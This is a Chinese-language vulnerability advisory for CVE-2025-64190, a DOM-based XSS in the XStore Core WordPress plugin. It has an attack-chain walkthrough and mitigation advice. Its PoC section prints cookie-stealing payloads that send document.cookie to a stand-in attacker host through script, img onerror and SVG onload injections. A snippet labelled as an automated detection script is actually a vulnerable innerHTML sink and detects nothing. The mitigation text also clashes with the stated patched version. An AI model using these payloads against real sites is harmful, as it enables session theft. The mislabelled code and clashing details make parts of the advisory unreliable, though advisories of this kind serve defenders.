CVE-2025-64190 XStore Core插件DOM型跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-64190

漏洞类型

DOM-Based XSS

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

8theme XStore Core (et-core-plugin)

漏洞概述

CVE-2025-64190是WordPress插件XStore Core（et-core-plugin）中的一个DOM型跨站脚本（XSS）漏洞。该漏洞由于在Web页面生成过程中对用户输入的不当中和（Improper Neutralization of Input During Web Page Generation）导致。攻击者可以利用此漏洞在受害者的浏览器中执行任意JavaScript代码，从而窃取会话令牌、劫持用户账户、修改页面内容或进行钓鱼攻击。DOM型XSS与传统存储型或反射型XSS不同，其漏洞代码完全在客户端执行，恶意payload存储在DOM环境中而非服务器响应中，这使得传统的服务端WAF难以检测。该漏洞影响XStore Core从任意版本到5.6之前的所有版本，要求攻击者具有低权限用户身份并需要用户交互才能触发。由于该插件在WordPress生态中广泛使用，估计影响数千个电子商务网站。

技术细节

DOM型XSS漏洞发生在客户端JavaScript代码处理用户输入时未进行适当的安全过滤。在XStore Core的et-core-plugin中，插件的前端JavaScript代码直接使用document.location、document.URL或innerHTML等API处理来自URL参数的输入，并将其插入到DOM中而未进行HTML实体编码或安全验证。攻击者可以通过构造恶意URL，在查询参数中注入JavaScript代码，如在URL的hash部分或特定参数中嵌入<script>标签或事件处理器（如onerror、onload）。当受害者访问该恶意URL时，浏览器会执行注入的恶意代码。由于攻击payload存储在客户端URL中，服务器日志可能只记录正常的页面请求，使得攻击更难被追踪。攻击者通常需要诱骗受害者点击特制链接，利用社会工程学手段完成攻击链的最后一步。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的XStore Core插件版本，确认版本小于5.6

STEP 2

步骤2: 漏洞点识别

通过代码审计或使用自动化工具（如Burp Suite、OWASP ZAP）识别插件中存在的DOM XSS漏洞点，通常在处理URL参数或hash的JavaScript代码中

STEP 3

步骤3: Payload构造

攻击者构造恶意JavaScript payload，可以是<script>标签、事件处理器（如onerror、onload）或通过其他DOM操作注入代码

STEP 4

步骤4: 社工攻击

攻击者通过钓鱼邮件、社交媒体或其他渠道诱骗具有低权限的合法用户点击包含恶意payload的特制链接

STEP 5

步骤5: 恶意代码执行

当受害者访问恶意URL时，浏览器解析页面并执行注入的JavaScript代码，实现会话劫持、敏感数据窃取或进一步攻击

STEP 6

步骤6: 数据外传

窃取的cookie、会话令牌或其他敏感信息通过fetch或XMLHttpRequest发送到攻击者控制的服务器

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- DOM-Based XSS PoC for CVE-2025-64190 -->
<!-- 攻击者构造的恶意URL示例 -->
<script>
// 恶意payload - 窃取用户cookie
var stolenCookie = document.cookie;
// 发送到攻击者控制的服务器
fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(stolenCookie));
</script>

<!-- 更隐蔽的payload - 使用事件处理器 -->
<img src=x onerror='fetch("https://attacker.com/log?data="+document.cookie)'>

<!-- 简化的攻击URL构造 -->
<!-- 正常URL: https://victim.com/?parameter=value -->
<!-- 恶意URL: https://victim.com/?parameter=<script>alert(document.domain)</script> -->
<!-- 或使用SVG标签绕过过滤 -->
<!-- https://victim.com/?parameter=<svg/onload=fetch("https://attacker.com/"+document.cookie)> -->

<!-- 实际的DOM XSS利用需要找到插件中具体的不安全sink点 -->
<!-- 常见的不安全DOM操作包括： -->
<!-- 1. element.innerHTML = userInput -->
<!-- 2. document.write(userInput) -->
<!-- 3. eval(userInput) -->
<!-- 4. setTimeout/setInterval with string -->
<!-- 5. location.href = userInput -->

<!-- 自动化检测脚本 -->
(function() {
    var params = new URLSearchParams(window.location.search);
    params.forEach(function(value, key) {
        // 检查是否直接使用用户输入在DOM中
        document.getElementById('target').innerHTML = value;
    });
})();

影响范围

XStore Core (et-core-plugin) < 5.6

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 限制低权限用户对插件功能的访问；2) 在Web服务器层面添加URL过滤规则，阻止包含可疑XSS模式的请求；3) 实施严格的Content-Security-Policy限制脚本来源；4) 监控服务器日志和WAF告警，及时发现可疑攻击尝试；5) 对管理员和编辑用户进行安全培训，提高对钓鱼攻击的警惕性。